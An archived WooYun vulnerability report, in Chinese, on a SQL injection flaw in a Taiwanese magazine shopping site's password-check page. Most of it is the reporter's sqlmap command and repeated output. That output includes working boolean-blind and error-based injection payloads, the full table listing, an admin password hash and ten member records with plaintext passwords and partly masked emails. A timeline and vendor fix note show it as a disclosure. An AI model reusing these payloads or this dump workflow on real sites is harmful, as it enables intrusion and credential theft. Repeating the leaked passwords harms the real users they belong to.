乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-03: 细节已通知厂商并且等待厂商处理中 2015-12-07: 厂商已经确认,细节仅向厂商公开 2015-12-17: 细节向核心白帽子及相关领域专家公开 2015-12-27: 细节向普通白帽子公开 2016-01-06: 细节向实习白帽子公开 2016-01-12: 厂商已经修复漏洞并主动公开,细节向公众公开
雜誌生活網存在SQL注射漏洞(2W多用户邮箱及明文密码)
地址:http://**.**.**.**/passwd_check.php
$ python sqlmap.py -u "http://**.**.**.**/passwd_check.php" -p pw --technique=BE --form --random-agent --batch --no-cast -D dgnetcomtw -T member -C login_id,pw,mobile_phone --dump --start 1 --stop 10
back-end DBMS: MySQL 5.0Database: dgnetcomtw+--------+---------+| Table | Entries |+--------+---------+| member | 20605 |+--------+---------+sqlmap resumed the following injection point(s) from stored session:---Parameter: pw (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: guest_name=qBbe&pw=-6313%' OR 8047=8047#&Submit.x=1&Submit.y=1 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: guest_name=qBbe&pw=%' AND (SELECT 4121 FROM(SELECT COUNT(*),CONCAT(0x71626a7671,(SELECT (ELT(4121=4121,1))),0x7178707871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='&Submit.x=1&Submit.y=1---web server operating system: Linux CentOS 5.10web application technology: Apache 2.2.3, PHP 5.2.12back-end DBMS: MySQL 5.0Database: dgnetcomtwTable: member[10 entries]+---------------------------------+------------+--------------+| login_id | pw | mobile_phone |+---------------------------------+------------+--------------+| yiceea@**.**.**.** | jow#igxu!w | || 1982911@**.**.**.** | zero1982 | || bagelsnbeans@**.**.**.** | bb53395679 | || caro@**.**.**.** | ci6666 | || ck540116@**.**.**.** | wen1017 | || happy_songtea@**.**.**.** | gt590118 | || huang2233@**.**.**.** | ss336699 | || jane10060415@**.**.**.** | rom515197 | || jdknight@**.**.**.** | jd5168 | || jiuan_ [email protected] | a860902 | |+---------------------------------+------------+--------------+
---Parameter: pw (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: guest_name=qBbe&pw=-6313%' OR 8047=8047#&Submit.x=1&Submit.y=1 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: guest_name=qBbe&pw=%' AND (SELECT 4121 FROM(SELECT COUNT(*),CONCAT(0x71626a7671,(SELECT (ELT(4121=4121,1))),0x7178707871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='&Submit.x=1&Submit.y=1---web server operating system: Linux CentOS 5.10web application technology: Apache 2.2.3, PHP 5.2.12back-end DBMS: MySQL 5.0current user: 'dgnet_28462919@%'current user is DBA: Falsedatabase management system users [1]:[*] 'dgnet_28462919'@'%'Database: dgnetcomtw+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| transactions | 32879 || article | 28044 || member | 20605 || member_bak | 13436 || member_second | 10610 || issue | 5538 || visit_count2 | 3186 || discount_ticket_record | 2711 || discount_ticket | 2401 || gift_info | 2198 || email | 2159 || product_message | 1951 || gift_subtopro | 1905 || gift_detail | 1628 || gift_content | 1285 || products_info | 941 || gift_transactions | 688 || products_detail | 654 || products_content | 421 || discount_price | 212 || gift_subassortment | 101 || gift_message | 91 || mem_point | 42 || comforum2 | 20 || subassortment | 20 || promotion | 17 || gift_asp2 | 15 || gift_assortment | 15 || auto_email_sender | 14 || email_visit_count | 14 || news_faq | 12 || payment | 10 || supply | 9 || ad | 4 || asp2 | 4 || assortment | 4 || happylife_product | 4 || to_website | 4 || asp | 3 || gift_promotion | 2 || shipping_fee | 2 || admin | 1 || album | 1 || brand | 1 || comforum | 1 || company | 1 || ssp | 1 || visit_count | 1 |+---------------------------------------+---------+Database: information_schema+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| COLUMNS | 1054 || SESSION_VARIABLES | 327 || GLOBAL_VARIABLES | 316 || GLOBAL_STATUS | 310 || SESSION_STATUS | 310 || COLLATION_CHARACTER_SET_APPLICABILITY | 197 || COLLATIONS | 197 || PARTITIONS | 100 || TABLES | 100 || STATISTICS | 84 || KEY_COLUMN_USAGE | 51 || TABLE_CONSTRAINTS | 51 || CHARACTER_SETS | 39 || PLUGINS | 23 || SCHEMA_PRIVILEGES | 18 || ENGINES | 9 || PROCESSLIST | 3 || SCHEMATA | 2 || USER_PRIVILEGES | 1 |+---------------------------------------+---------+columns LIKE 'pass' were found in the following databases:Database: dgnetcomtwTable: admin[1 column]+----------+-------------+| Column | Type |+----------+-------------+| password | varchar(32) |+----------+-------------+Database: dgnetcomtwTable: dealer[1 column]+------------+-------------+| Column | Type |+------------+-------------+| login_pass | varchar(10) |+------------+-------------+Database: dgnetcomtwTable: supply[1 column]+------------+-------------+| Column | Type |+------------+-------------+| login_pass | varchar(10) |+------------+-------------+Database: dgnetcomtwTable: admin[1 entry]+----------------------------------+| password |+----------------------------------+| 419f55773e0c3d85f82b0793708188ad |+----------------------------------+Database: dgnetcomtwTable: dealer[0 entries]+------------+| login_pass |+------------++------------+Database: dgnetcomtwTable: supply[9 entries]+------------+| login_pass |+------------+| || || || || || || || || |+------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: pw (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: guest_name=qBbe&pw=-6313%' OR 8047=8047#&Submit.x=1&Submit.y=1 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: guest_name=qBbe&pw=%' AND (SELECT 4121 FROM(SELECT COUNT(*),CONCAT(0x71626a7671,(SELECT (ELT(4121=4121,1))),0x7178707871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='&Submit.x=1&Submit.y=1---web server operating system: Linux CentOS 5.10web application technology: Apache 2.2.3, PHP 5.2.12back-end DBMS: MySQL 5.0Database: dgnetcomtwTable: member[27 columns]+-------------------+------------------+| Column | Type |+-------------------+------------------+| birth | date || buy_book | char(2) || child | varchar(50) || country | varchar(10) || customer_address | varchar(255) || customer_area | varchar(50) || customer_email | varchar(50) || customer_id | int(10) || customer_name | varchar(255) || customer_phone | varchar(20) || customer_postcode | varchar(10) || customer_province | varchar(20) || epaper | char(2) || id_num | varchar(10) || income | varchar(50) || job | varchar(50) || login_id | varchar(255) || member_type | char(2) || merrige | varchar(4) || mobile_phone | varchar(12) || pw | varchar(20) || school | varchar(255) || sex | char(2) || sign_date | datetime || total_point | int(20) unsigned || usr_arealive | varchar(10) || usr_arealive1 | varchar(10) |+-------------------+------------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: pw (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: guest_name=qBbe&pw=-6313%' OR 8047=8047#&Submit.x=1&Submit.y=1 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: guest_name=qBbe&pw=%' AND (SELECT 4121 FROM(SELECT COUNT(*),CONCAT(0x71626a7671,(SELECT (ELT(4121=4121,1))),0x7178707871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='&Submit.x=1&Submit.y=1---web server operating system: Linux CentOS 5.10web application technology: Apache 2.2.3, PHP 5.2.12back-end DBMS: MySQL 5.0Database: dgnetcomtw+--------+---------+| Table | Entries |+--------+---------+| member | 20605 |+--------+---------+sqlmap resumed the following injection point(s) from stored session:---Parameter: pw (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: guest_name=qBbe&pw=-6313%' OR 8047=8047#&Submit.x=1&Submit.y=1 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: guest_name=qBbe&pw=%' AND (SELECT 4121 FROM(SELECT COUNT(*),CONCAT(0x71626a7671,(SELECT (ELT(4121=4121,1))),0x7178707871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='&Submit.x=1&Submit.y=1---web server operating system: Linux CentOS 5.10web application technology: Apache 2.2.3, PHP 5.2.12back-end DBMS: MySQL 5.0Database: dgnetcomtwTable: member[10 entries]+---------------------------------+------------+--------------+| login_id | pw | mobile_phone |+---------------------------------+------------+--------------+| yiceea@**.**.**.** | jow#igxu!w | || 1982911@**.**.**.** | zero1982 | || bagelsnbeans@**.**.**.** | bb53395679 | || caro@**.**.**.** | ci6666 | || ck540116@**.**.**.** | wen1017 | || happy_songtea@**.**.**.** | gt590118 | || huang2233@**.**.**.** | ss336699 | || jane10060415@**.**.**.** | rom515197 | || jdknight@**.**.**.** | jd5168 | || jiuan_ [email protected] | a860902 | |+---------------------------------+------------+--------------+
上WAF。
危害等级:高
漏洞Rank:16
确认时间:2015-12-07 01:04
感謝通報
2016-01-12:已修復